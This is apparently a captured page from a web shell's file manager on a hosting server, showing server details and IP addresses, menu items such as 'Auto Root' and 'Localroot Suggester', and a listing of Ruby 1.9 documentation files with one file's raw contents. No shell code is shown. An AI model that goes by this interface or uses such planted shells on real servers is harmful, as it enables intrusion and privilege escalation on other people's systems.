Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Struct /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d-i.ri
875
B
-rw-r--r--
2023-07-26 17:26
%5b%5d%3d-i.ri
847
B
-rw-r--r--
2023-07-26 17:26
%5b%5d-i.ri
820
B
-rw-r--r--
2023-07-26 17:26
as_json-i.ri
288
B
-rw-r--r--
2023-07-26 17:26
cdesc-Struct.ri
1.47
KB
-rw-r--r--
2023-07-26 17:26
each-i.ri
739
B
-rw-r--r--
2023-07-26 17:26
each_pair-i.ri
862
B
-rw-r--r--
2023-07-26 17:26
eql%3f-i.ri
393
B
-rw-r--r--
2023-07-26 17:26
hash-i.ri
256
B
-rw-r--r--
2023-07-26 17:26
inspect-i.ri
313
B
-rw-r--r--
2023-07-26 17:26
json_create-c.ri
334
B
-rw-r--r--
2023-07-26 17:26
length-i.ri
484
B
-rw-r--r--
2023-07-26 17:26
members-i.ri
524
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
1.86
KB
-rw-r--r--
2023-07-26 17:26
pretty_print-i.ri
153
B
-rw-r--r--
2023-07-26 17:26
pretty_print_cycle-i.ri
165
B
-rw-r--r--
2023-07-26 17:26
select-i.ri
700
B
-rw-r--r--
2023-07-26 17:26
size-i.ri
480
B
-rw-r--r--
2023-07-26 17:26
to_a-i.ri
507
B
-rw-r--r--
2023-07-26 17:26
to_json-i.ri
319
B
-rw-r--r--
2023-07-26 17:26
to_s-i.ri
135
B
-rw-r--r--
2023-07-26 17:26
values-i.ri
511
B
-rw-r--r--
2023-07-26 17:26
values_at-i.ri
645
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI"values_at:ETI"Struct#values_at;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"0Returns an array containing the elements in;TI"A+self+ corresponding to the given selector(s). The selectors;TI"-may be either integer indices or ranges.;TI"#See also </code>.select<code>.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [ I"a = %w{ a b c d e f } ;FI"a.values_at(1, 3, 5) ;FI"a.values_at(1, 3, 5, 7) ;FI"!a.values_at(-1, -3, -5, -7) ;FI"a.values_at(1..3, 2...5);F: @file0I"3struct.values_at(selector,... ) -> an_array ;T0[ I"(*args);FI" struct.c;T